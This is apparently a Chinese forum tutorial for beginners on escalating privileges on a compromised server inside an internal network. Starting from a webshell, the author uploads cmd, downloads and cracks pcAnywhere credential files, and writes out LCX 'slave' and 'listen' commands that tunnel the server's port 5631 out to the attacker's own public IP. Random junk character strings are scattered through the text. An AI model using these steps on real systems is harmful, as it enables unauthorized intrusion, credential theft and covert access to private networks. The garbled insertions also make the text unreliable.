pcanywhere之内网提权
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。提权方法:pcanywhere+LCX
*@*H)qYa0i#U
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。Iwvu~
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
[attach]1548[/attach]/FPNwgOuhD8n7F
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
'd Cai }q"o
[attach]1549[/attach]&g4X^_eB2w
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。7W3x?P3Y"JVy}klC
jm)bB?rd2j
[attach]1550[/attach]3~*]@#L$LW[
[attach]1551[/attach]
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``:hX0J+\j.t?@
JGQ0mU%sD-|X(g Bl
[attach]1552[/attach]
LCX的用法再简单说下:
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)B#@i uoY#P
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)d D r fU
